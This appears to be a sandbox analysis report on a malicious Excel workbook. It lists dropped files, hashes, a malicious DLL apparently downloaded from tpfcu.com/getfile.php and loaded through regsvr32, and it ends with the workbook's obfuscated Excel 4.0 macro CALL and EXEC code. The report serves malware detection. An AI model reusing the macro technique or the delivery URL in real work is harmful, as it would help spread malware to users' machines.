                                                                                                                                                      SHA-256:65830A65CB913BEE83258E4AC3E140FAF131E7EB084D39F7020C7ACC825B0A58
                                                                                                                                                      SHA-512:DA32AF6A730884E73956E4EB6BFF61A1326B3EF8BA0A213B5B4AAD6DE4FBD471B3550B6AC2110F1D0B2091E33C70D44E498F897376F8E1998B1D2AFAC789ABEB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: MSCF............,...................I........d.........R9b .authroot.stl.3..).4..CK..8T....c_.d....A.K...].M$[v.4.)7-.%.QIR..$t)Kd.-[..T\{..ne.....{..<.......Ab.<..X....sb.....e........dbu.3...0........X..00&Z....C...p0.}..2..0m.}..Cj.9U..J.j.Y...#.L..\X..O.,...,.qu..]..(B.nE~Q...)..Gcx.....}...f....zw.a..9+[.<0.'..2 .s..ya..J......wd....OO!.s....`.WA...F6._f....6...g..2..7.$,....X.k..&...E...g.....>uv."..!......xc......C..?....P0$.Y..?u....Z0.g3.>W0&.y.(....].`>... ..R.q..wg*X......qB!.B....Z.4..>.R.M..0.8...=.8..Ya.s.......add..)..w.4.&.z...2.&74.5]..w.j.._iK..||[.w.M.!<-.}%.C<tDX5\s._..I..*..nb.....GCQ.V..r..Y.............q...0..V)Tu>.Z..r...I...<.R{Ac..x^. .<A........|.{.....Q...&....X..C$....e9.:..vI..x.R4...L......%g...<..}'{....E8Sl...E".h...*.........ItVs.K......3.9.l..`D..e.i`....y...,..5....aSs`..W...d...t.J..]....'u3..d]7..=e....[R!:........Q.%..@........ga.v.~..q....{.!N.b]x..Zx.../;#}.f.)k.c9..{rmPt..z5.m=..q..%.D#<+Ex....1|.._F.
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                      Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):328
                                                                                                                                                      Entropy (8bit):3.132472625894721
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:kKgy3Pse8N+SkQlPlEGYRMY9z+4KlDA3RUeWlK1MMx:4Ks8kPlE99SNxAhUe3OMx
                                                                                                                                                      MD5:B84815C12C603EC6FB8D1EDA4CA29530
                                                                                                                                                      SHA1:CD18E3BC8FCFB385C1225EF5ED0FCF1BD9DF0434
                                                                                                                                                      SHA-256:961CA06C24F3E4B504765841EFB908C623E99B0EC81EBB6804928909F4360E52
                                                                                                                                                      SHA-512:7771C7B0CC1743F21C13270B0B8390410E1BBD9BB849F9DF045F5A9976B99A169328F257CD09403420C24B62275F332CE54909F8603970F07C71C90501984D2F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: p...... .........<..~]..(....................................................... ............L......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.9.0.e.6.c.f.e.3.4.c.d.7.1.:.0."...
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\2CA63FBD-E4D0-4324-9237-CB578953FC60
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):134915
                                                                                                                                                      Entropy (8bit):5.369271958078095
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:lcQIKNEeBXA3gBwlpQ9DQW+z7534ZlCKWXboOilX5ENLWME9:REQ9DQW+zAXOe
                                                                                                                                                      MD5:76B550BC14095A4AFBB5E04BE5F42175
                                                                                                                                                      SHA1:2A74379C0333997DFED5BB5F7BDB7F707BAF68E4
                                                                                                                                                      SHA-256:7F1E14B77DF7F3FCEB0C34441CA6F6A68288706308BF5B072FAE111AF6BE0817
                                                                                                                                                      SHA-512:41056D2FD4A84E050F7EDC8F962B02C093AD02F3B2B8E410F424A6E155672AF6BA67D21579EC5B0BF6A56F9E8B71B2B0035C5E6B822B78072D1EB2DCBCA3E94F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-09T13:21:51">.. Build: 16.0.14207.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\2FDD9604.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 264 x 113, 8-bit/color RGB, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):9924
                                                                                                                                                      Entropy (8bit):7.973758306371751
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB
                                                                                                                                                      MD5:B34FB4F2F0F9E70B72BA3AFD028CD97C
                                                                                                                                                      SHA1:C6868336F78DEA1E718965DF3341039581DB5B5A
                                                                                                                                                      SHA-256:189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB
                                                                                                                                                      SHA-512:4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .PNG........IHDR.......q............sRGB.........pHYs..........+....&iIDATx^.Wp.G~.{"r.. H.9s.,Q.v........\..../wu..t.o..ru...+W]....vWa).Q.b&.@d.D.q....{0....GB....8...........X,&L1.0...........b...0Xa ....a..0.0.ap.@......'.*. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.*. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.*. ..W[....cfTDC.....V.....W`...Q!.JEaE....5O.{\N.p8b.5.#*.t......^...p..A.+.0cC..(.v.,.............qO....-b.0.#l.......p...w...sN]m..-c.=....L....I..T...I.3....]...r.....Ae.H%..!......O...?-.I..".4...........p...{..0..#,..........%4.;E....w..]......ga...X....#...h@.'E.'.|...I.a..J..V...!...E..?8[CQ?.'...5Qy........X..)Y..ic 0....!..Gf..4...o.R../.^..y2.'..p.....KO..v.T....~.......-]"..u9Q..i..^e..!.i".^.......C.CKV..~Ku.4"m.$>cKP...x...7
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3DB5784F.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 168 x 72, 8-bit/color RGB, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6177
                                                                                                                                                      Entropy (8bit):7.959095006853368
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a
                                                                                                                                                      MD5:C7ED6FC355D8632DB1464BE3D56BF5CC
                                                                                                                                                      SHA1:615484A338922DDF00B903CFA48060AD60D70207
                                                                                                                                                      SHA-256:26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C
                                                                                                                                                      SHA-512:FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .PNG........IHDR.......H......m)a....sRGB.........pHYs..........+......IDATx^....E...1.Y. ..."3.(.D......A..(....(.C.X.QP..b.UQAdA..9'I:Hf..f.....s....._.A..s.3...Vu........Z.[.q.P.-9.b..q.......|.r F......c..1..........e.->....@..;n.q..(.bt.q...>F9...[|\.1..]v..A..G..y._3...*3M.YG7.J.)..RK]u.j}.*^J.....R...j.:=}..qN .sV&..F.a.@..Vs.P...%.A......~..w..P.Be.-].4..arss.9~.8d.@.d...."..?.G....z............(.T.......G.;w.?....w....S.H.+...W.^..........E..-_.|....D-....#G.{..<r....P.K..$.{D....kzzz.R....`?..O;........#....tb..g..gU.r>G.......:t........a........p..c..]......M.6.'O.]......8q...RSS.YBB.M.j..}..I.&.:%J.x..7o....d.*U..233.].......E.m}..../^..nt..X.b,..{<....=.....3....z....v..]0.e.}...?.....w..y...)S.L.F.:t..U...+F...l......&...322.6m.../.[.J.a.=..%Kx....E...ys.....z...i.z..g...G...e.7.|.h....!C^x.5k"......<.R..k....4iR.V-.._.~....:..P.O@.y.:..:G=.\...J ...u...]%.T.n.......v..A`Y.......V...^{.X^.I`1w.q........
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5E6A3635.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 178 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):5744
                                                                                                                                                      Entropy (8bit):7.966496386988271
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf
                                                                                                                                                      MD5:9AD30E24270C495AE68EAF3A1EEECBFB
                                                                                                                                                      SHA1:8642D256E7FFBEF5804A2D2220A1FE475A99DC36
                                                                                                                                                      SHA-256:6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20
                                                                                                                                                      SHA-512:EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .PNG........IHDR.......L.....FpzV....sRGB.........pHYs..........+......IDATx^.\.tTU..u...@@. .b..su....."....+k..Aeu..rX.*.feE..(M.....b..BB.P.f&S_.~w&.I.aH...'...0..........u.2.!...`....8_..,.T.#....,.X...N....NN-l........5`...Z.,..-L..k.":9..Y.,Z..c.Etrja..X.0.G.......f..ha...]......2`.......,..S..e...)<:v.XD'..6.E.Sxt....NN-l........5`...Z.,..-L..k.":9..Yt......9.{.f;...f../Mh...B..GK.....FG.....s...MN.vqp"+.|.m[&11..<O....?...EQ4.H...Z'M... #.T......vS..^..p..)........1...JJr?.gq.V..X..h..T._Zr2g..W^...A./.W...P....q.By.49..5M--.e...5}..{.!.s4M./Xx2.....`...I>s..4U...]...(5.8o>.X.[..xS.w)../.c.Lh..a..uQ.fd.....jh.Z.d..(..=.....#.....o.y....g...-....=?..X.f./..=n|`.j..k.........{.4...b..T.-h..F..;u.x....[!.\....*'Nx^....C..b...8........|F.$.4.......&?.>#.d.\p.R..k..>t0?.-3g..b......s.O..E...4o...\O=.7O=z...u1$n..6..C.]A.X...Z.tX.......I..W.....P...h.@..+q..F.kcI..x\>.....0.4..p....}.~e...).w....%Q.$W......8........PY.k..J....T..b.l
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\682ADEB2.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):956
                                                                                                                                                      Entropy (8bit):7.683552542542939
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:64ZJH5wka2YQydYiFNcincNrtNmt5xx4tRFB:JJH5fYuW5c3wPoFB
                                                                                                                                                      MD5:32C83607A5C98C5A634278E5AED3AD61
                                                                                                                                                      SHA1:EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362
                                                                                                                                                      SHA-256:4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF
                                                                                                                                                      SHA-512:AF19A013377F0F7B47E54D99D0AFA222BE46072C47944E8640B09A4993DFDDC906B7C68F7E3DAB5B3F126C9AD1090EADBF17FF7068EE8E360D0EA46811C0DB3C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .PNG........IHDR.............;0......sRGB.........gAMA......a.....pHYs..........o.d...QIDATHK.VMHTQ..2.h.X."h....A....]B...m.(h..b?.$...f.)..ta...jS..!..h.ETD.!."."C..y.....=.>8...{.s..32.0Fv.F...kz..&.|_......9.)m."......m..$9.j...E.@.:D.-..0...L.hk..(....s.'.k.A-.-......(.....jR[m..d..O.-?:.c..70.{..sw'X.j.^j+..d....N.. .r......Z.[[[..c...r.../.M`l.]&#.aR..[{...<O....<d...3....F...:..s9..-...x..R...q..ON.KO;..0..^.....9.S.}..x...22......r..f....'......+o...A..7......q..l...S........s/.{.^..Pj1`.b.!t..>o..!.C.e.}....Y.....t.......r.MDq=.=..._....c..3%p...j...hI1.[.^.#..."#...e...6..I-j;.9j;o/...Q2...w-.?.<..r../?...0.`.;.lz.M...\. ..]x...\h^.....r..';... ...<..j..E._.E..u..g....7.X....T....7........(&.[....... T....;V1w..,EU.W"./.........m%.u'x/.u]*....@.-.L..G.....Q."..%fb.Z*.,...K.%BX....]`J=.h".Vef...2..8.g.jX.2s..vY.u|.4p.\.h...W....(.r.....^Y....2$8F...>`p._.c..}.txq#.$.`:@...Y..?.j.IK.Fu....IEND.B`.
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\86406406.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 288 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):23989
                                                                                                                                                      Entropy (8bit):7.989754044300238
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:SGjFc9Ll+HCggc/h3GXoQjZVVawDIPsTDGY9R9cNc+3JY0kEtWhfEWa92ppgMoF3:S5plMCgzGoOzVawisTDGY9Rs3JYhEtqy
                                                                                                                                                      MD5:839795652A8FE78F26F4D86D757ABDE8
                                                                                                                                                      SHA1:979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60
                                                                                                                                                      SHA-256:1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E
                                                                                                                                                      SHA-512:E6D5CB06679832DE768E23EF42B9780E4E8327A057A3EA0A6CD5B76908B210078EF659CA44C8723960AB59A0DB85A052C45E7A29D7FA8A643275BA5F210F6773
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .PNG........IHDR... ...M.............sRGB.........pHYs..........+....]ZIDATx^.......{fs..|.S........d....`...9.....8..6/.......E.BB.....yw..w.-.FF.g.5~5..ivv.'..U.Tu..8.../=..R9s.Rn....Ry.....@..V.m).bCU..n....Ue.,~b;K.Q.KUlUR.`../...:.Y.Jy..Jy8.Q.K..Xzg..a.Y....X[...s.........`...Q1b....*.......|e.a..$..(...e....e.e..i$SQ.i.y....o.@......p..yx.b.~....Z"..Xc{,..{..o....`...9K..;........=...%.@]? .h!.......W...Z....T.Uul..V..PS[.j.......,..W...T.Z..e..T*.J)..+.K*Wt......W.].K..4......{.<)...V+e....u.I..A...`o..w.....jUU...b...'....EW....R\..'..b......U.X..SKV..O&..?.).....}._....\....*..hU\..W.m.I..|.0\...o..?c.a3'.2}...u....`.9..*....q.dc....!..vq..B...9....&..rsJ.\...)..}.W./.._.g.5e....sy.......@I.l.J.UgW...q..o9^O.g;V.r*v...U.0..._?.5|...x...m..Z....6...._..l.....dc......K..`U.c+;.K.^...`.L....j:W(...fuB=.p..w=..D....q..&..8.V.....UU.b#z...Xyo..X...*...w..U.....sW2...d.u.~.~..)l....e.q.:#r.f.....m|...w_...1.i..bs.F..L.`.}..6V..w.....z
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dll
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                      Category:downloaded
                                                                                                                                                      Size (bytes):205312
                                                                                                                                                      Entropy (8bit):6.709188825960524
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:o7tbwam7niPOMFJjOknVCSd/3391UnrWoTmutZ/dyQCK+VBVmICKUizHz2/bf:StbwamK1jlnnV91UrWStFdjaVF2/b
                                                                                                                                                      MD5:28193BA741232F91101849F606FA8419
                                                                                                                                                      SHA1:12FD2B9850C58A9384EDCBDEC2F94EFD32B0C0B5
                                                                                                                                                      SHA-256:67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2
                                                                                                                                                      SHA-512:783213432A0CC54B92F5A49B0F314D949D48810A5D1FC36C92D26A302812E9B66618A0666FAE4BD33911DBC0542390844DA1436D4B9BC73A73D12B4C67929D1F
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: sample.ocx, Detection: malicious, Browse
                                                                                                                                                      IE Cache URL:https://tpfcu.com/getfile.php
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B[..:...:...:..$Z...:..$Z...:..$Z..~:..=d...:..=d...:..=d...:..$Z...:...:..k:...:...:...d...:...dY..:...d...:..Rich.:..................PE..d....P.`.........." .........................................................p............`.............................................T...d...x........N......l............`.........8...........................0................................................text...0........................... ..`.rdata...".......$..................@..@.data...............................@....pdata..l...........................@..@.gfids..............................@..@.rsrc....N.......N..................@..@.reloc.......`......................@..B................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\18720000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):80566
                                                                                                                                                      Entropy (8bit):7.893302821449264
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:Xelem3l7eO+dRRVnyY7lMVGoIahaDHTU6hryF70cAeWvijWGHc:bol7eO6RSY72sTU2yF70cAijW2c
                                                                                                                                                      MD5:5138B6C608292E4C867FC32717C1CF59
                                                                                                                                                      SHA1:836E1C79573D2D8F2E5FCED81BDCA22EEE921EF1
                                                                                                                                                      SHA-256:F04037BBF157BEAF7297874FD3700B1059E20B1E6FBF199C61F2B1E112E660C7
                                                                                                                                                      SHA-512:43AF1CC70CD407BBB7BD1B78B98F1054A85A44C96DDAEA6B1AA3AA2D5D0A943659D445D8566010CE5FB177C2597A57FEEA27D5440B8A8D285E2BD5891A31C67C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .UKO.0..#...|]%n9..)..rd.`..kO..~.c.....P.*-.\.r..|.O&.+k.....k......J..e....Va.N....l....?.&w..X..a....o.Q.`.6>.....V$....B.E..|4..w.\.S.`.._X.{....o......,.2m3>?.;.s..!D.FK..4...;[._,....%3...Ba...iB..1.BJ..~....q.C..!.1.u......y.m....p...Q+.nDL..RZ|e......f?I..b.+..).7V..gN..........D^N.OH..H.w#WR...(..#.?.i3..3..+r...}.\.....O.........~s/7...{.A.&...x.}....1[.....D.ti$.D...d.....1.]."..4l..-.U..rr.!Oq.j.6/...........PK..........!........v.......[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\L3YD7CE.dll
                                                                                                                                                      Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):205312
                                                                                                                                                      Entropy (8bit):6.709188825960524
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:o7tbwam7niPOMFJjOknVCSd/3391UnrWoTmutZ/dyQCK+VBVmICKUizHz2/bf:StbwamK1jlnnV91UrWStFdjaVF2/b
                                                                                                                                                      MD5:28193BA741232F91101849F606FA8419
                                                                                                                                                      SHA1:12FD2B9850C58A9384EDCBDEC2F94EFD32B0C0B5
                                                                                                                                                      SHA-256:67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2
                                                                                                                                                      SHA-512:783213432A0CC54B92F5A49B0F314D949D48810A5D1FC36C92D26A302812E9B66618A0666FAE4BD33911DBC0542390844DA1436D4B9BC73A73D12B4C67929D1F
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: sample.ocx, Detection: malicious, Browse
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B[..:...:...:..$Z...:..$Z...:..$Z..~:..=d...:..=d...:..=d...:..$Z...:...:..k:...:...:...d...:...dY..:...d...:..Rich.:..................PE..d....P.`.........." .........................................................p............`.............................................T...d...x........N......l............`.........8...........................0................................................text...0........................... ..`.rdata...".......$..................@..@.data...............................@....pdata..l...........................@..@.gfids..............................@..@.rsrc....N.......N..................@..@.reloc.......`......................@..B................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\Desktop\~$Documents_13134976_1377491379.xlsb
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):165
                                                                                                                                                      Entropy (8bit):1.6081032063576088
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                      MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                      SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                      SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                      SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      C:\Users\user\iepfusn.dll
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):205312
                                                                                                                                                      Entropy (8bit):6.709188825960524
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:o7tbwam7niPOMFJjOknVCSd/3391UnrWoTmutZ/dyQCK+VBVmICKUizHz2/bf:StbwamK1jlnnV91UrWStFdjaVF2/b
                                                                                                                                                      MD5:28193BA741232F91101849F606FA8419
                                                                                                                                                      SHA1:12FD2B9850C58A9384EDCBDEC2F94EFD32B0C0B5
                                                                                                                                                      SHA-256:67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2
                                                                                                                                                      SHA-512:783213432A0CC54B92F5A49B0F314D949D48810A5D1FC36C92D26A302812E9B66618A0666FAE4BD33911DBC0542390844DA1436D4B9BC73A73D12B4C67929D1F
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: sample.ocx, Detection: malicious, Browse
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B[..:...:...:..$Z...:..$Z...:..$Z..~:..=d...:..=d...:..=d...:..$Z...:...:..k:...:...:...d...:...dY..:...d...:..Rich.:..................PE..d....P.`.........." .........................................................p............`.............................................T...d...x........N......l............`.........8...........................0................................................text...0........................... ..`.rdata...".......$..................@..@.data...............................@....pdata..l...........................@..@.gfids..............................@..@.rsrc....N.......N..................@..@.reloc.......`......................@..B................................................................................................................................................................................................

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Microsoft Excel 2007+
                                                                                                                                                      Entropy (8bit):7.867132102918904
                                                                                                                                                      TrID:
                                                                                                                                                      • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                      • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                      File name:Documents_13134976_1377491379.xlsb
                                                                                                                                                      File size:64636
                                                                                                                                                      MD5:276bf3db434b887bb77adca0bd46e130
                                                                                                                                                      SHA1:eee2be9136f2c70a28b6ca5289e73e2a38453da2
                                                                                                                                                      SHA256:27180043ebeb8f2aa8728c5ee020fb5368be3df4e9008b8f01242bf82d5780ce
                                                                                                                                                      SHA512:abe0052635a1064304828a7b8fa8663997fb023d542944ddb3bdb346170bd5fbe9a76b2e53184e4b3c7a9e09a768982a396b7253d83c309fd7f522f427262e7a
                                                                                                                                                      SSDEEP:1536:LvnO2wWjlMVGoIahaDHTU6hryF70liWWGH0AeWl+R:LGCj2sTU2yF70liWW200+R
                                                                                                                                                      File Content Preview:PK..........!.+...............[Content_Types].xml ...(.....................................................................................................................................................................................!!..................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OpenXML
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "Documents_13134976_1377491379.xlsb"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:
                                                                                                                                                      Application Name:
                                                                                                                                                      Encrypted Document:
                                                                                                                                                      Contains Word Document Stream:
                                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:

                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                      CALL(before.2.18.46.sheet!BJ29&before.2.18.46.sheet!BN29, before.2.18.46.sheet!BM35&before.2.18.46.sheet!BM38&before.2.18.46.sheet!BS41&before.2.18.46.sheet!BU41&before.2.18.46.sheet!BS25, before.2.18.46.sheet!BK50&before.2.18.46.sheet!BS42, before.2.18.46.sheet!BP33, before.2.18.46.sheet!BJ19&BJ20&BJ21&BJ22, before.2.18.46.sheet!BN24, before.2.18.46.sheet!BP38, before.2.18.46.sheet!BP41)

                                                                                                                                                      =EXEC(Sheet1!BF42&Sheet1!BF43&Sheet1!BF44&Sheet1!BN24)=HALT()
